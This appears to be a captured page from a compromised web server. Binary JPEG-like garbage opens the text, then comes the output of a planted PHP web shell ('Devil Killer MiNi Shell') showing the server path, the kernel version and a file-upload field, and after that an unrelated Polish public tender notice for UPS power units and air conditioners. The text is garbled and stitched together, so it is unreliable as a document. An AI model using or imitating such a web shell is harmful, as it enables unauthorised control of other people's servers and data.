JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211126/0028654301-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup urządzeń do zasilania awaryjnego UPS budynku CEP Chałubińskiego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">TATRZAŃSKI PARK NARODOWY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 122456180</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Kuźnice 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zakopane</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">34-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL219 - Nowotarski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@tpn.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.tpn.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup urządzeń do zasilania awaryjnego UPS budynku CEP Chałubińskiego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c21664c5-4eb4-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00286543</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00011050/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.6 Zakup urządzeń do zasilania awaryjnego UPS budynku CEP Chałubińskiego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-c21664c5-4eb4-11ec-8c2d-66c2f1230e9c <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://epuap.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów<br/>elektronicznych,elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z miniPortalu oraz Regulaminie ePUAP. Wymagania szczegółowo zostały opisane w SWZ oraz załącznikach</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zapisy RODO zostały opisane w SWZ oraz załącznikach</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zapisy RODO zostały opisane w SWZ oraz załącznikach</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/541/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2.1.	Część 1- Zasilacz awaryjny UPS 120 kVA i Zasilacz awaryjny UPS 20 kVA<br/><br/>SPECYFIKACJA TECHNICZNA ZASILACZA AWARYJNEGO UPS 120 kVA<br/>Opis wymagań<br/>techniczno-funkcjonalnych	Wymagane wartości /funkcje/<br/>Technologia VFI (true on-line, podwójne przetwarzanie energii)<br/>Moc znamionowa	120kVA / 108kW<br/>Wyjściowy współczynnik mocy (PF)	0,9<br/>Technologia prostownika	Moduły IGBT wysokiej częstotliwości z kontrolą współczynnika mocy, niezależne sterowanie w każdej fazie<br/>Współczynnik zniekształcenia prądu wejściowego THDI	THDI ≤ 3%<br/>Wejściowy współczynnik mocy	cosφ ≥ 0,99<br/>Napięcie wejściowe	220/380, 230/400 lub 240/415 VAC<br/>Tolerancja napięcia wejściowego	±20% (dla 100% obciążenia) / -40% (dla 70% obciążenia)<br/>Częstotliwość wejściowa	50Hz / 60Hz ±10%<br/>Sprawność AC-AC w trybie pracy on-line z obciążeniem 100% ≥95,5%<br/>Możliwość rozbudowy mocy w okresie eksploatacji (praca równoległa)	do 8 jednostek<br/>Napięcie wyjściowe	380/400VAC 3F + N, ±1%<br/>Częstotliwość wyjściowa	50/60Hz (programowalna)<br/>Zintegrowane bezprzerwowe przełączniki obejściowe (by-pass) wewnątrz zasilacza UPS	Statyczny przełącznik,<br/>ręczny odłącznik serwisowy<br/>Czas podtrzymania	Minimum 41 minut dla 100% obciążenia<br/>Automatycznie regulowany prąd ładowania baterii, w zależności od pojemności zainstalowanych akumulatorów	Wymagane<br/>Intuicyjny panel graficzny TFT w języku polskim	Wymagane<br/>Tolerancja napięcia wyjściowego	±1%<br/>Zniekształcenia napięcia wyjściowego	≤ 2% z obciążeniem liniowym<br/>Współczynnik szczytu przy obciążeniu znamionowym	3:1<br/>Stabilność częstotliwości wyjściowej bez synchronizacji	0,1%<br/>Przeciążenie inwertera	125% przez 10 minut<br/>150% przez 1 minutę<br/>Złącze interfejsów	2xRS232<br/>Złącze styków bezpotencjałowych (programowalne NO/NC)	Wymagane<br/>Interfejs EPO (do wyłącznika ppoż.)	Wymagane<br/>Slot na dodatkowe karty komunikacyjne	Wymagane<br/>Styk generatora	Wymagane<br/>Bezprzerwowy bypass zewnętrzny	Wymagane<br/>Możliwość diagnostyki parametrów pracy każdego akumulatora z osobna	Złącza do podłączenia urządzenia Akumetronom_CES umożliwiającego przeprowadzanie bezpośredniego pomiaru napięcia na każdym akumulatorze stosu bateryjnego UPS-a podczas przeglądu, bez wyłączania jakiegokolwiek elementu układu zasilania i z zapewnieniem bezpieczeństwa dostaw energii do odbiorów (pomiar od 1 do 80 akumulatorów w jednym pomiarze z bardzo dokładnym odwzorowaniem ch-ki rozładowania każdego z osobna).<br/>Baterie	Szczelne, bezobsługowe, w technologii AGM o żywotności projektowanej minimum 10 lat w temperaturze 25 stopni Celsjusza<br/>Diagnostyka parametrów urządzenia UPS i baterii Automatyczna diagnostyka parametrów urządzenia UPS i baterii na panelu UPS-a i z wykorzystaniem oprogramowania do zarządzania i monitorowania UPS<br/>Poziom hałasu w odległości 1m	≤ 62 dBA<br/>Rejestr zdarzeń Dziennik zdarzeń w UPS-ie (system pamięci dla 512 zdarzeń<br/>Spełnienie norm EN62040-1, EN62040-2, EN62040-3 potwierdzone deklaracją zgodności CE	Wymagane<br/>Maks. wymiary szafy UPS (szer. x gł. x wys.)	475 x 890 x 1440 mm<br/>Maksymalna powierzchnia zajmowana przez szafę UPS	0,42 m2<br/>Maksymalna waga UPS (bez baterii)	210 kg<br/>Instrukcja w języku polskim	Wymagane<br/>Gwarancja	24 miesiące zarówno na UPS, jak i na akumulatory<br/>Autoryzowany serwis producenta oferowanego zasilacza UPS przeprowadzi instalację i uruchomienie urządzenia na obiekcie oraz profesjonalne szkolenie z zakresu obsługi zamawiającego pracowników	Wymagane<br/><br/><br/><br/><br/><br/>SPECYFIKACJA TECHNICZNA ZASILACZA AWARYJNEGO UPS 20 kVA<br/>Opis wymagań<br/>techniczno-funkcjonalnych	Wymagane wartości /funkcje/<br/>Technologia VFI (true on-line, podwójne przetwarzanie energii)<br/>Moc znamionowa	20kVA / 18kW<br/>Wyjściowy współczynnik mocy (PF)	0,9<br/>Współczynnik zniekształcenia prądu wejściowego THDI THDI ≤ 5%<br/>Wejściowy współczynnik mocy	cosφ ≥ 0,99<br/>Napięcie wejściowe	400 VAC + N<br/>Tolerancja napięcia wejściowego	190V – 485V<br/>Częstotliwość wejściowa	40-70 Hz<br/>Minimalna sprawność AC-AC w trybie pracy on-line z obciążeniem 100% 93%<br/>Minimalna sprawność w trybie ECO 98,0% dla 100% obciążenia<br/>Możliwość rozbudowy mocy w okresie eksploatacji (praca równoległa)	do 6 jednostek<br/>Napięcie wyjściowe	360-380-400-415 VAC<br/>Częstotliwość wyjściowa	50/60Hz (programowalna)<br/>Zintegrowane bezprzerwowe przełączniki obejściowe (by-pass) wewnątrz zasilacza UPS	Statyczny przełącznik,<br/>ręczny odłącznik serwisowy<br/>Czas podtrzymania	21 minut dla obciążenia 18kW<br/>Intuicyjny panel graficzny	Wymagane<br/>Funkcja COLD START – możliwość uruchomienia UPS z baterii akumulatorów	Wymagane<br/>Stabilizacja napięcia wyjściowego	±1%<br/>Zniekształcenia napięcia wyjściowego	≤ 2% z obciążeniem liniowym<br/>≤ 5% z obciążeniem nieliniowym<br/>Współczynnik szczytu przy obciążeniu znamionowym	3:1<br/>Przeciążenie inwertera przy wyjściowym współczynniku mocy 0,9	102%-125% przez 10 minut<br/>125% -150% przez 1 minutę<br/>&gt;150% przez 0,5 sekundy<br/>Przeciążenie bypassu wewnętrznego	102%-125% przez 20 minut<br/>125%-150% przez 2 minuty<br/>&gt;150% przez 1 sekundę<br/>Złącze interfejsów	RS232 + USB<br/>Interfejs EPO (do wyłącznika ppoż.)	Wymagane<br/>Slot na dodatkowe karty komunikacyjne	Wymagane<br/>Możliwość diagnostyki parametrów pracy każdego akumulatora z osobna	Złącza do podłączenia urządzenia Akumetronom_CES umożliwiającego przeprowadzanie bezpośredniego pomiaru napięcia na każdym akumulatorze stosu bateryjnego UPS-a podczas przeglądu, bez wyłączania jakiegokolwiek elementu układu zasilania i z zapewnieniem bezpieczeństwa dostaw energii do odbiorów (pomiar od 1 do 80 akumulatorów w jednym pomiarze z bardzo dokładnym odwzorowaniem ch-ki rozładowania każdego z osobna).<br/>Baterie	Szczelne, bezobsługowe, w technologii AGM o żywotności projektowanej minimum 5 lat w temperaturze 25 stopni Celsjusza<br/>Akumulatory zainstalowane wewnątrz obudowy zasilacza UPS	Wymagane<br/>Podwójne wejście linii zasilającej (osobne dla toru prostownika i bypassu)	Wymagane<br/>Możliwość zainstalowania wewnątrz zasilacza UPS 3 stosów bateryjnych	Wymagane<br/>Regulowany stos bateryjny (14szt. / 16szt. / 18szt. / 20szt. akumulatorów)	Wymagane<br/>Test bateryjny	Wymagane<br/>Oprogramowanie zapewniające pełny monitoring, zarządzanie i automatyczny shut-down systemu operacyjnego	Wymagane<br/>UPS wyposażony w kartę pracy równoległej	Wymagane<br/>Bezprzerwowy bypass zewnętrzny	Wymagane<br/>Poziom hałasu w odległości 1m	≤ 60 dBA<br/>Rejestr zdarzeń Wymagane<br/>Spełnienie wszystkich obowiązujących norm bezpieczeństwa potwierdzone deklaracją zgodności CE	Wymagane<br/>Maks. wymiary szafy UPS (szer. x gł. x wys.)	350 x 785 x 1078 mm<br/>Maksymalna waga UPS (z bateriami)	230 kg<br/>Instrukcja w języku polskim	Wymagane<br/>Gwarancja	24 miesiące<br/>Autoryzowany serwis producenta oferowanego zasilacza UPS przeprowadzi instalację i uruchomienie urządzenia na obiekcie oraz profesjonalne szkolenie z zakresu obsługi dla wyznaczonych przez zamawiającego pracowników	Wymagane<br/>3.	Do każdego produktu Wykonawca ma dołączyć kartę/karty produktu o których mowa w pkt. 7.7. Dział XI SWZ w której będą podane wszystkie wymagane parametry podane w specyfikacji technicznej. W przypadku nie załączenia kart do oferty zamawiający wezwie Wykonawcę do ich uzupełnienia zgodnie z PZP. Zamawiający zastrzega sobie prawo do weryfikacji oczekiwanych parametrów w zainstalowanym urządzeniu. W przypadku niespełnienia któregokolwiek z oczekiwanych parametrów Wykonawca na swój koszt zdemontuje dostarczone urządzenie oraz dostarczy zasilacz spełniający wszystkie parametry zawarte w SIWZ.<br/><br/>4.	Wymagana gwarancja na dostarczone produkty: min. 24 miesiące, liczone od dnia dostawy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">31682530-4 - Awaryjne urządzenia energetyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy produktu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2.2	Część 2- Klimatyzatory precyzyjne 2 komplety.<br/><br/>SPECYFIKACJA TECHNICZNA KLIMATYZACJI PRECYZYJNEJ (2 komplety)<br/>Opis wymagań<br/>techniczno-funkcjonalnych	Wymagane wartości /funkcje/<br/>CHŁODZENIE<br/>Wydajność chłodnicza	Min. 3,3/7,1/8,1 kW<br/>Pobór mocy	1,83kW<br/>SEER	6,7<br/>Klasa efektywności energetycznej	Min. A++<br/>Zakres zastosowania	-15~+46 °C<br/>GRZANIE<br/>Wydajność grzewcza	Min. 3,5/8,0/10,2 kW<br/>Pobór mocy	2,16kW<br/>SCOP 4,2<br/>Klasa efektywności energetycznej	Min. A+<br/>JEDNOSTKA WEWNĘTRZNA<br/>Zasilanie	220-240V / 50Hz<br/>Wymiary (wys. x szer. x gł.)	Maks. 235x1285x690 mm<br/>Waga	Maks. 33kg<br/>Wydatek powietrza	960/1020/1080/1200 m3/h<br/>Poziom ciśnienia akustycznego	Maks. 36/41 dB(A)<br/>JEDNOSTKA ZEWNĘTRZNA<br/>Wymiary (wys. x szer. x gł.)	Maks. 945x958x360 mm<br/>Waga	Maks. 72kg<br/>Przepływ powietrza	3300 m3/h<br/>Poziom dźwięku chłodzenie	Maks. 48 dB(A)<br/>Poziom hałasu grzanie	Maks. 50 dB(A)<br/>Czynnik chłodniczy (typ/ilość)	R32/2,8kg<br/>Prąd pracy chłodzenie	6,70A<br/>Prąd pracy grzanie	7,46A<br/>Moduł pracy naprzemiennej	Wymagane<br/><br/>3.	Do każdego produktu Wykonawca ma dołączyć kartę/karty produktu o których mowa w pkt. 7.7. Dział XI SWZ w której będą podane wszystkie wymagane parametry podane w specyfikacji technicznej. W przypadku nie załączenia kart do oferty zamawiający wezwie Wykonawcę do ich uzupełnienia zgodnie z PZP. Zamawiający zastrzega sobie prawo do weryfikacji oczekiwanych parametrów w zainstalowanym urządzeniu. W przypadku niespełnienia któregokolwiek z oczekiwanych parametrów Wykonawca na swój koszt zdemontuje dostarczone urządzenie oraz dostarczy zasilacz spełniający wszystkie parametry zawarte w SIWZ.<br/><br/>4.	Wymagana gwarancja na dostarczone produkty: min. 24 miesiące, liczone od dnia dostawy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39717200-3 - Urządzenia klimatyzacyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy produktu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">3.	Do każdego produktu Wykonawca ma dołączyć kartę/karty produktu o których mowa w pkt. 7.7. Dział XI SWZ w której będą podane wszystkie wymagane parametry podane w specyfikacji technicznej. W przypadku nie załączenia kart do oferty zamawiający wezwie Wykonawcę do ich uzupełnienia zgodnie z PZP. Zamawiający zastrzega sobie prawo do weryfikacji oczekiwanych parametrów w zainstalowanym urządzeniu. W przypadku niespełnienia któregokolwiek z oczekiwanych parametrów Wykonawca na swój koszt zdemontuje dostarczone urządzenie oraz dostarczy zasilacz spełniający wszystkie parametry zawarte w SIWZ</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany 